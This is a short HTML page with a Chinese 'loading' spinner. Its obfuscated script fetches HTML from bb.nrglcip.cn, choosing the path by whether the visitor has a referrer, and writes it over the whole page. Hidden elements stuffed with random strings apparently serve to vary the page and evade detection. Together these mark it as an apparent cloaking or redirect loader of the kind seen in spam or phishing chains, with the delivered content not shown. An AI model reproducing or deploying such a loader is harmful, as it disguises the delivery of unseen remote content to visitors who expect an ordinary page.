<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Wt24SKgTHa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Wt24SKgTHa .DctQnu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Wt24SKgTHa .content {
            line-height: 50px;
            text-align: center
        }

        .Wt24SKgTHa .img {
            width: 100%
        }

        .Wt24SKgTHa .kV4SHJ6vcm {
            text-align: center
        }

        .Wt24SKgTHa .kV4SHJ6vcm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Wt24SKgTHa .kV4SHJ6vcm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Wt24SKgTHa .kV4SHJ6vcm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Wt24SKgTHa .kV4SHJ6vcm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Wt24SKgTHa .kV4SHJ6vcm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Wt24SKgTHa .kV4SHJ6vcm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Wt24SKgTHa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HYBFmNemx04u(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var muVvt = HYBFmNemx04u('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ muVvt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ muVvt +".html?a=share";
		}
		
        GwWks5H=url+"#"+new Date().getTime();
        GwWks5H && function() {
            $.get(GwWks5H, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >qoaLKUlkhCWNfIOxBqBF5UeDXrcd9Kfb8FF</li>
<li style='display:none' >qoaLKUlkhCWNfIOxBqBF5UeDXrcd9Kfb8FF</li>
<li style='display:none' >qoaLKUlkhCWNfIOxBqBF5UeDXrcd9Kfb8FF</li>
<div style='display:none'>k3S2bB997nthfFDNLPfUJ878DDbz</div><div class="Wt24SKgTHa">
    <div class="DctQnu">
        <div class="kV4SHJ6vcm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>C26gc5JU5kMXASBRWA</a>
<img  src='' style='display:none'>
<p  style='display:none'>wy7z7lGOhMhnImGRe7Ap5CebIvDtX0WfWwBHyl48wyJBdBMrjdeO4cik6tvtBvcGLiFVI248B4nHi</p>
<b style='display:none' >nJYpIgAYucagR1kGLDos2z7XPcauXAX8YxEwXRQfk8z7fBUlk45uOpcZbKfcKy2OzthVHMIZE9EMnx5ok9q1x</b>
<ul style='display:none' >l75cPAxRumHO1n14H5ntev6qZDvI14w9HP0FRlzVhtAl9AKl9L5WTn3LSgemkhJ4tudRXeB3co6CLEwWbkaek8YX42PEomoKS</ul>
<b style='display:none' >nJYpIgAYucagR1kGLDos2z7XPcauXAX8YxEwXRQfk8z7fBUlk45uOpcZbKfcKy2OzthVHMIZE9EMnx5ok9q1x</b></body>
</html>